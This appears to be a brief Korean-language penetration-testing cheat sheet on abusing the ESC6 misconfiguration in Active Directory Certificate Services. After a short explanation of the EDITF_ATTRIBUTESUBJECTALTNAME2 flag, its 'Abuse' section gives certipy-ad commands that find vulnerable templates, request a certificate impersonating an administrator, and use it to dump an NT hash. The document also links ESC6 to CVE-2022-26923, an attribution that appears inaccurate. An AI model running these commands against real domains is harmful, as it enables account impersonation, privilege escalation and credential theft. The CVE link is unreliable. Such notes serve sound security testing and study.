ESC6

해당 취약점은 2022년 5월 Microsoft 보안 업데이트를 통해 패치된 CVE-2022-26923입니다.

CA의 구성 설정 중 EDITF_ATTRIBUTESUBJECTALTNAME2 플래그는 인증서를 요청 할 때 클라이언트가 SAN(Subject Alt Name) 필드를 요청할 수 있도록 허가하는 특수한 속성입니다.

이 플래그가 활성화 되어있다면 Supply in the request 가 활성화 되지 않아도 다른 사용자를 가장하여 인증서 발행이 가능합니다.

보안 업데이트가 된 환경이더라도 SID 보안 확장이 미흡한 경우 취약점은 여전히 유효합니다.

Abuse

UNIX

# 취약한 템플릿 열거
certipy-ad find -u '<username>' -p '<password>' -dc-ip '<dc-ip>' -vulnerable -stdout -enabled

# 템플릿을 통한 인증서 발급
certipy-ad req -u '<username@domain>' -p '<password>' -dc-ip '<dc-ip>' -target '<ca-fqdn>' -ca '<ca-name>' -template '<template>' -upn '<administrator@domain>' -sid '<sid>'

# 인증서로부터 nt해시 덤프
certipy-ad auth -pfx '<pfx>' -dc-ip '<dc-ip>'